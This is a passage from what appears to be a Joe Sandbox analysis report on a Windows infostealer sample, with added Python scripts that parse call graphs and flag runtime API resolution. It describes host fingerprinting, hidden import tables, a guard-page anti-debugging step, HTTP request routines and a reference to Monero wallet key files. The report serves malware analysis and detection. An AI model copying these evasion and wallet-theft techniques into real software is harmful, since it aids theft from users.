• Base64 helpers: 1c9af9 LocalAlloc, 1c9b14 CryptStringToBinaryA, 1c9b39 LocalFree; 1d8ead and 1d8f05 CryptBinaryToStringA (size pass, GetProcessHeap RtlAllocateHeap at 1d8ece, encode pass)
• String-compare dispatch: StrCmpCA at 1d17c4 with one branch straight to ExitProcess at 1d17cf, then a chain of StrCmpCA at 1d185d, 1d187f, 1d18ad, 1d18cf, 1d18f1, 1d1913, 1d1932, 1d1951, 1d1970; further StrCmpCA chains at 1d0799 / 1d0865 / 1d099c, 1d0e27 / 1d0e67 / 1d0ea4 and 1d0fb2
• Host-fingerprinting routines called in sequence from 1d1a00-1d2699: registry value reads at 1d76c6, 1d7720 and 1d7e00 (RegOpenKeyExA, RegQueryValueExA, RegCloseKey); 1d77c0 GetCurrentProcess IsWow64Process; 1d7980 GetLocalTime wsprintfA; 1d7a30 GetTimeZoneInformation, 1d7a9a wsprintfA; 1d7b00 GetUserDefaultLocaleName with 1d8d20 LocalAlloc CharToOemW; 1d7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList with 1d7c46 GetLocaleInfoA per layout and 1d7d1e LocalFree; 1d7d80 GetSystemPowerStatus; 1d207e GetCurrentProcessId, then 1d9470 OpenProcess and 1d9493 GetModuleFileNameExA CloseHandle; 1d7fb9 GetLogicalProcessorInformationEx retried after 1d7fd8 GetLastError with buffer reallocation (1d8a10 GetProcessHeap RtlAllocateHeap, 1d89f9 GetProcessHeap HeapFree); 1d7ed0 GetSystemInfo wsprintfA; 1d814d GlobalMemoryStatusEx, 1d819b wsprintfA; 1d87fb GetProcessHeap RtlAllocateHeap wsprintfA; 1d8b82 GetSystemTime
• Registry enumeration 1d8320: 1d835c RegOpenKeyExA, 1d83f8 RegEnumKeyExA loop, 1d843f wsprintfA RegOpenKeyExA, 1d84c1 and 1d856e RegQueryValueExA per subkey, RegCloseKey at 1d8485, 1d8601 and 1d8613
• Process enumeration 1d8680: 1d86bc CreateToolhelp32Snapshot Process32First, 1d86e8 Process32Next loop, 1d875d CloseHandle
• In-memory loader reached from 1c9880 through 1c6fb0 and 1c6d40: 1c668f and 1c6743 VirtualAlloc, 1c6a09 LoadLibraryA, 1c6ba8 GetProcAddress, with 1c6ee6 VirtualFree and 1c6f26 FreeLibrary on the unwind path
• Shared string helpers: 1da740 / 1da7a0 / 1da8a0 lstrcpy; 1da820 lstrlen lstrcpy; 1da968 lstrcpy lstrcat; 1da9b0 lstrcpy lstrlen lstrcpy lstrcat; 1da920 (3 API calls); 1daad0 (no API)]
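The call-graph data for this function cluster is exported as a flat edge list (node id, address, optional API label, and "id->id" edges), which is unreadable once the rendered graph is gone but is easy to rebuild. The following is an added example, not part of the Joe Sandbox report or of the sample: a small Python parser that reconstructs the graph and walks the caller chain back from InternetReadFile to show which function sets up the request. The sample input is a fragment copied from the edge list for the 1c4d47-1c4e67 request routine (constructed for this example), and the token rules (a decimal id followed by a lowercase hex address starts a node, anything else extends the current node's label) are assumptions about the export format, not something Joe Sandbox documents.

```python
"""Rebuild a Joe Sandbox call graph from its edge-list text and walk caller chains.

Added example for this report page; not part of Joe Sandbox or of the sample.
Format assumptions (inferred from the report text, not documented):
  "<id> <hexaddr> [label words...]" declares a node, "<id>-><id>" declares an edge,
  and labels such as "3 API calls" are opaque summaries of a callee.
"""
import re
from collections import defaultdict

NODE_ID = re.compile(r"^\d{4,}$")        # graph node ids are decimal, 5 digits in this report
ADDR = re.compile(r"^[0-9a-f]{5,8}$")     # basic-block / function address, lowercase hex
EDGE = re.compile(r"^(\d+)->(\d+)$")

# Constructed sample: the HttpSendRequestA / InternetReadFile cluster copied from the
# report's edge list, plus the "15708->14773" edge that appears further down the same list.
SAMPLE = """
14754 1c4d47 14753->14754 14755 1da8a0 lstrcpy 14754->14755 14756 1c4d50 14755->14756
14757 1da920 3 API calls 14756->14757 14758 1c4d6e 14757->14758 14759 1da8a0 lstrcpy 14758->14759
14760 1c4d77 14759->14760 14761 1da740 lstrcpy 14760->14761 14762 1c4d92 14761->14762
14763 1da920 3 API calls 14762->14763 14764 1c4db3 14763->14764 14765 1da920 3 API calls 14764->14765
14766 1c4dba 14765->14766 14767 1da8a0 lstrcpy 14766->14767 14768 1c4dc6 14767->14768
14769 1c4de7 lstrlen 14768->14769 14770 1c4dfa 14769->14770 14771 1c4e03 lstrlen 14770->14771
15708 1daad0 14771->15708 14773 1c4e13 HttpSendRequestA 14774 1c4e32 InternetReadFile 14773->14774
14775 1c4e67 InternetCloseHandle 14774->14775 14780 1c4e5e 14774->14780 14778 1da800 14775->14778
14777 1da9b0 4 API calls 14777->14780 14778->14699 14779 1da8a0 lstrcpy 14779->14780
14780->14774 14780->14775 14780->14777 14780->14779 15708->14773
"""


def parse_edge_list(text):
    """Return (nodes, edges): nodes maps id -> {"addr", "label"}, edges is a set of (src, dst)."""
    tokens = text.split()
    nodes, edges, cur = {}, set(), None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        m = EDGE.match(tok)
        if m:
            edges.add((m.group(1), m.group(2)))
            i += 1
            continue
        if NODE_ID.match(tok) and i + 1 < len(tokens) and ADDR.match(tokens[i + 1]):
            cur = tok
            nodes[cur] = {"addr": tokens[i + 1], "label": []}
            i += 2
            continue
        if cur is not None:  # any other token belongs to the current node's label
            nodes[cur]["label"].append(tok)
        i += 1
    for node in nodes.values():
        node["label"] = " ".join(node["label"])
    return nodes, edges


def api_histogram(nodes):
    """Count nodes that name each API directly; "N API calls" summaries are opaque and skipped."""
    counts = defaultdict(int)
    for node in nodes.values():
        label = node["label"]
        if not label or label.endswith("API calls"):
            continue
        for name in label.split():
            counts[name] += 1
    return dict(counts)


def nodes_calling(nodes, api_name):
    """Ids of the nodes whose label names api_name, in id order."""
    return sorted((n for n, d in nodes.items() if api_name in d["label"].split()), key=int)


def caller_chain(edges, target):
    """Walk predecessor edges from target back toward the root of the fragment.

    Back-edges (the 1c4e32 <-> 1c4e5e InternetReadFile loop) are cut by the seen set, and the
    lowest-numbered unvisited predecessor is taken at each step so the walk is deterministic.
    """
    preds = defaultdict(set)
    for src, dst in edges:
        preds[dst].add(src)
    chain, seen, cur = [target], {target}, target
    while True:
        candidates = sorted(preds[cur] - seen, key=int)
        if not candidates:
            return chain
        cur = candidates[0]
        seen.add(cur)
        chain.append(cur)


def describe(nodes, chain):
    """Render a chain as "addr label" lines; ids that only appear in edges become "?"."""
    lines = []
    for nid in chain:
        node = nodes.get(nid, {"addr": "?", "label": ""})
        lines.append((node["addr"] + " " + node["label"]).rstrip())
    return lines


if __name__ == "__main__":
    graph_nodes, graph_edges = parse_edge_list(SAMPLE)
    print("APIs named in this fragment:", api_histogram(graph_nodes))
    for nid in nodes_calling(graph_nodes, "InternetReadFile"):
        print("\ncallers of", graph_nodes[nid]["addr"], "InternetReadFile, innermost first:")
        for line in describe(graph_nodes, caller_chain(graph_edges, nid)):
            print("   ", line)
```

On the sample the walk from 1c4e32 InternetReadFile runs back through 1c4e13 HttpSendRequestA, the 1daad0 stub and the lstrlen / lstrcpy string assembly at 1c4e03-1c4d47, i.e. the whole request is built in one function before the single send. Run it on the full edge list above to get the same picture for the second request routine (1c5f35) and for the fingerprinting chain.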

                      Control-flow Graph (rendered graph not preserved; recovered from the block list, executed / not-executed colouring lost)
                      • 1d9860-1d9874: call 1d9750
                      • 1d987a-1d9a8e: call 1d9780, then GetProcAddress * 21 (all against module base 74DD0000, see APIs)
                      • 1d9a93-1d9af2: LoadLibraryA * 5
                      • 1d9af4-1d9bbc: seven further GetProcAddress calls in five groups (1d9af4, 1d9b16, 1d9b4f, 1d9b71, 1d9b92); each group is entered through a two-way branch from a short check block and can be bypassed, so these resolutions are conditional (consistent with null checks on the LoadLibraryA results, though the graph alone does not show the condition); exit at 1d9bc1
                      APIs
                      • GetProcAddress.KERNEL32(74DD0000,00E32320), ref: 001D98A1
                      • GetProcAddress.KERNEL32(74DD0000,00E32368), ref: 001D98BA
                      • GetProcAddress.KERNEL32(74DD0000,00E32170), ref: 001D98D2
                      • GetProcAddress.KERNEL32(74DD0000,00E322A8), ref: 001D98EA
                      • GetProcAddress.KERNEL32(74DD0000,00E32440), ref: 001D9903
                      • GetProcAddress.KERNEL32(74DD0000,00E38FA0), ref: 001D991B
                      • GetProcAddress.KERNEL32(74DD0000,00E258F0), ref: 001D9933
                      • GetProcAddress.KERNEL32(74DD0000,00E25870), ref: 001D994C
                      • GetProcAddress.KERNEL32(74DD0000,00E32338), ref: 001D9964
                      • GetProcAddress.KERNEL32(74DD0000,00E32398), ref: 001D997C
                      • GetProcAddress.KERNEL32(74DD0000,00E32380), ref: 001D9995
                      • GetProcAddress.KERNEL32(74DD0000,00E323E0), ref: 001D99AD
                      • GetProcAddress.KERNEL32(74DD0000,00E25910), ref: 001D99C5
                      • GetProcAddress.KERNEL32(74DD0000,00E323F8), ref: 001D99DE
                      • GetProcAddress.KERNEL32(74DD0000,00E32410), ref: 001D99F6
                      • GetProcAddress.KERNEL32(74DD0000,00E256B0), ref: 001D9A0E
                      • GetProcAddress.KERNEL32(74DD0000,00E32428), ref: 001D9A27
                      • GetProcAddress.KERNEL32(74DD0000,00E32458), ref: 001D9A3F
                      • GetProcAddress.KERNEL32(74DD0000,00E25810), ref: 001D9A57
                      • GetProcAddress.KERNEL32(74DD0000,00E32188), ref: 001D9A70
                      • GetProcAddress.KERNEL32(74DD0000,00E25670), ref: 001D9A88
                      • LoadLibraryA.KERNEL32(00E321A0,?,001D6A00), ref: 001D9A9A
                      • LoadLibraryA.KERNEL32(00E321D0,?,001D6A00), ref: 001D9AAB
                      • LoadLibraryA.KERNEL32(00E321B8,?,001D6A00), ref: 001D9ABD
                      • LoadLibraryA.KERNEL32(00E32200,?,001D6A00), ref: 001D9ACF
                      • LoadLibraryA.KERNEL32(00E32260,?,001D6A00), ref: 001D9AE0
                      • GetProcAddress.KERNEL32(75A70000,00E32230), ref: 001D9B02
                      • GetProcAddress.KERNEL32(75290000,00E32248), ref: 001D9B23
                      • GetProcAddress.KERNEL32(75290000,00E32278), ref: 001D9B3B
                      • GetProcAddress.KERNEL32(75BD0000,00E32290), ref: 001D9B5D
                      • GetProcAddress.KERNEL32(75450000,00E25970), ref: 001D9B7E
                      • GetProcAddress.KERNEL32(76E90000,00E38F60), ref: 001D9B9F
                      • GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 001D9BB6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AddressProc$LibraryLoad
                      • String ID: #$($$0"$8#$@$$H"$NtQueryInformationProcess$X$$`"$h#$p!$pV$pX$pY$x"$#
                      • API String ID: 2238633743-2620304504
                      • Opcode ID: 409d7b41d31482bb73a921a3eac332a1044700b57909e0d1321c65122524f687
                      • Instruction ID: fccb3a82c38195e7210a6b9f0efa5573c060493838ed285e558975015b4c5420
                      • Opcode Fuzzy Hash: 409d7b41d31482bb73a921a3eac332a1044700b57909e0d1321c65122524f687
                      • Instruction Fuzzy Hash: ECA16CB6510340AFD344EFA8FF88A6677F9F78C301704C53AA605E3264D7399865CB5A
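
The APIs listing for 1d9860 is the signature of an import table built at runtime: 21 GetProcAddress calls against one module handle (74DD0000), five LoadLibraryA calls, then seven more GetProcAddress calls against the newly loaded modules. Only one of the 28 name arguments is shown as a string (NtQueryInformationProcess); the others are pointers in the 00E25000-00E39000 range, outside every image region listed under Memory Dump Source (001C0000 through 00857000), which is consistent with the names being decrypted into a heap buffer shortly before use. The following is an added example, not part of the Joe Sandbox report or of the sample: a Python triage script that parses listing lines of this shape, groups resolutions by module handle, measures how many names the sandbox could not read, and flags the pattern. The sample input is a subset of the listing above (constructed for this example), and the threshold of five resolutions per handle is an assumption, not a Joe Sandbox rule.

```python
"""Summarise runtime API resolution from a Joe Sandbox "APIs" listing.

Added example for this report page; not part of Joe Sandbox or of the sample.
Each listing line has the shape
    GetProcAddress.KERNEL32(74DD0000,00E32320), ref: 001D98A1
i.e. <api>.<module>(<arguments>), ref: <call site>. For GetProcAddress the first
argument is the module handle and the second the name, shown as a pointer unless
the sandbox could read it as a string. The detection threshold is an assumption.
"""
import re
from collections import defaultdict

LINE = re.compile(
    r"^\s*•?\s*(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEXPTR = re.compile(r"^[0-9A-Fa-f]{8}$")   # an argument the sandbox could only show as a raw value

# Constructed sample: a subset of the listing for the function at 1d9860 (first six of the
# 21 kernel32 resolutions, the five LoadLibraryA calls and the seven resolutions that follow).
SAMPLE = """
• GetProcAddress.KERNEL32(74DD0000,00E32320), ref: 001D98A1
• GetProcAddress.KERNEL32(74DD0000,00E32368), ref: 001D98BA
• GetProcAddress.KERNEL32(74DD0000,00E32170), ref: 001D98D2
• GetProcAddress.KERNEL32(74DD0000,00E322A8), ref: 001D98EA
• GetProcAddress.KERNEL32(74DD0000,00E32440), ref: 001D9903
• GetProcAddress.KERNEL32(74DD0000,00E38FA0), ref: 001D991B
• LoadLibraryA.KERNEL32(00E321A0,?,001D6A00), ref: 001D9A9A
• LoadLibraryA.KERNEL32(00E321D0,?,001D6A00), ref: 001D9AAB
• LoadLibraryA.KERNEL32(00E321B8,?,001D6A00), ref: 001D9ABD
• LoadLibraryA.KERNEL32(00E32200,?,001D6A00), ref: 001D9ACF
• LoadLibraryA.KERNEL32(00E32260,?,001D6A00), ref: 001D9AE0
• GetProcAddress.KERNEL32(75A70000,00E32230), ref: 001D9B02
• GetProcAddress.KERNEL32(75290000,00E32248), ref: 001D9B23
• GetProcAddress.KERNEL32(75290000,00E32278), ref: 001D9B3B
• GetProcAddress.KERNEL32(75BD0000,00E32290), ref: 001D9B5D
• GetProcAddress.KERNEL32(75450000,00E25970), ref: 001D9B7E
• GetProcAddress.KERNEL32(76E90000,00E38F60), ref: 001D9B9F
• GetProcAddress.KERNEL32(76E90000,NtQueryInformationProcess), ref: 001D9BB6
"""


def parse_api_lines(text):
    """Return one dict per call: api, module, args (list of str), ref (call site as int)."""
    calls = []
    for raw in text.splitlines():
        m = LINE.match(raw)
        if not m:
            continue
        calls.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [a.strip() for a in m.group("args").split(",")],
            "ref": int(m.group("ref"), 16),
        })
    return sorted(calls, key=lambda c: c["ref"])   # call-site order is program order here


def resolution_summary(calls):
    """Group GetProcAddress by module handle; keep the names the sandbox rendered as strings."""
    per_base = defaultdict(lambda: {"count": 0, "named": []})
    for c in calls:
        if c["api"] != "GetProcAddress" or len(c["args"]) < 2:
            continue
        base, name = c["args"][0], c["args"][1]
        per_base[base]["count"] += 1
        if name != "?" and not HEXPTR.match(name):
            per_base[base]["named"].append(name)
    return dict(per_base)


def unreadable_name_ratio(calls):
    """Share of GetProcAddress calls whose name argument is shown only as a pointer/value.

    A high ratio means the import names were not plain strings in the image when the
    sandbox looked, which is what a runtime-decrypted import table looks like.
    """
    gpa = [c for c in calls if c["api"] == "GetProcAddress" and len(c["args"]) >= 2]
    if not gpa:
        return 0.0
    unreadable = sum(1 for c in gpa if c["args"][1] == "?" or HEXPTR.match(c["args"][1]))
    return unreadable / len(gpa)


def loadlibrary_count(calls):
    return sum(1 for c in calls if c["api"] == "LoadLibraryA")


def flag_dynamic_resolution(calls, threshold=5):
    """Heuristic (threshold is an assumption): `threshold` or more GetProcAddress calls against
    one module handle marks an import table built at runtime instead of by the loader."""
    hot = [base for base, v in resolution_summary(calls).items() if v["count"] >= threshold]
    return {"suspicious": bool(hot), "bases": hot, "loadlibrary_calls": loadlibrary_count(calls)}


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for base, info in resolution_summary(parsed).items():
        print(f"{base}: {info['count']} GetProcAddress, readable names: {info['named'] or '-'}")
    print(f"name arguments shown only as pointers: {unreadable_name_ratio(parsed):.0%}")
    print(flag_dynamic_resolution(parsed))
```

Against the full listing the kernel32 handle scores 21 and every name but NtQueryInformationProcess is unreadable; a static import scan of the same binary would show none of these functions, which is why hunting rules for this family should key on the resolution pattern and the few readable names rather than on the import table.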

                      Control-flow Graph (rendered graph not preserved; recovered from the block list, executed / not-executed colouring lost)
                      • 1c45c0-1c4695: RtlAllocateHeap
                      • 1c46a0-1c46a6 and 1c46ac-1c474a: a loop (1c46a0 branches either into 1c46ac, which falls back to 1c46a0, or out to 1c474f); the loop body makes no API calls and references the string listed below at 1c46b7, 1c471e, 1c4729 and 1c473f
                      • 1c474f-1c47a9: loop exit, VirtualProtect
                      APIs
                      • RtlAllocateHeap.NTDLL(00000000), ref: 001C460E
                      • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 001C479C (read in argument order: dwSize 4, flNewProtect 0x100 = PAGE_GUARD; this arms a guard page rather than making a region executable, so it is an anti-debugging step, not the unpacker's write-then-execute transition)
                      Strings
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45C7, 001C45DD, 001C45E8, 001C45F3, 001C4622, 001C4643, 001C4657, 001C4662, 001C4683, 001C46B7, 001C471E, 001C4729, 001C473F, 001C4770 (one benign-looking sentence referenced 14 times from a single function; this is packer filler, not a string the sample uses functionally, and it is a weak indicator on its own)
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C475A
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C462D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4638
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C474F
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C45D2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46D8
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4678
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4617
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4713
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4734
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C4765
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46AC
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46CD
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C46C2
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C466D
                      • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs: 001C477B
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      • Associated: 00000000.00000002.1746760550.00000000001C0000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.0000000000271000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000027D000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.00000000002A2000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746780935.000000000040A000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000005B0000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.0000000000681000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006A7000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006AE000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1746921253.00000000006BD000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747153843.00000000006BE000.00000080.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747259207.0000000000856000.00000040.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.1747273421.0000000000857000.00000080.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_1c0000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeapProtectVirtual
                      • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                      • API String ID: 1542196881-2218711628
                      • Opcode ID: b162ac0689d8668918082ea20788c774ab10a604d44779b9b1ca5e96541eb42b
                      • Instruction ID: 5fcb03a7134cbde642f41efc0eee52eb72cc67e96dfe4576f35076be03ec4194
                      • Opcode Fuzzy Hash: b162ac0689d8668918082ea20788c774ab10a604d44779b9b1ca5e96541eb42b
                      • Instruction Fuzzy Hash: AC4129246C6A8C6AE764BFAFCCC1FBD77575F42FCEF509044AA20522C2C7B8650059E5

                      Control-flow Graph

                      (rendered graph not reproduced; it spans blocks 1c4880-1c4fa2 and covers the InternetOpenA, StrCmpCA, InternetConnectA, HttpOpenRequestA, HttpSendRequestA, InternetReadFile and InternetCloseHandle calls listed under APIs below; block edges and Executed / Not Executed colouring omitted)
                      APIs
                        • Part of subcall function 001DA7A0: lstrcpy.KERNEL32(?,00000000), ref: 001DA7E6
                        • Part of subcall function 001C47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 001C4839
                        • Part of subcall function 001C47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 001C4849
                        • Part of subcall function 001DA740: lstrcpy.KERNEL32(001E0E17,00000000), ref: 001DA788
                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001C4915
                      • StrCmpCA.SHLWAPI(?,00E3EA28), ref: 001C493A
                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 001C4ABA
                      • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,001E0DDB,00000000,?,?,00000000,?,",00000000,?,00E3EA88), ref: 001C4DE8
                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 001C4E04
                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 001C4E18
                      • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 001C4E49
                      • InternetCloseHandle.WININET(00000000), ref: 001C4EAD
                      • InternetCloseHandle.WININET(00000000), ref: 001C4EC5
                      • HttpOpenRequestA.WININET(00000000,00E3E948,?,00E3E3A0,00000000,00000000,00400100,00000000), ref: 001C4B15
                        • Part of subcall function 001DA9B0: lstrlen.KERNEL32(?,00E39130,?,\Monero\wallet.keys,001E0E17), ref: 001DA9C5
                        • Part of subcall function 001DA9B0: lstrcpy.KERNEL32(00000000), ref: 001DAA04
                        • Part of subcall function 001DA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 001DAA12
                        • Part of subcall function 001DA8A0: lstrcpy.KERNEL32(?,001E0E17), ref: 001DA905
                        • Part of subcall function 001DA920: lstrcpy.KERNEL32(00000000,?), ref: 001DA972
                        • Part of subcall function 001DA920: lstrcat.KERNEL32(00000000), ref: 001DA982
                      • InternetCloseHandle.WININET(00000000), ref: 001C4ECF
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.1746780935.00000000001C1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001C0000, based on PE: true
                      Joe Sandbox IDA Plugin
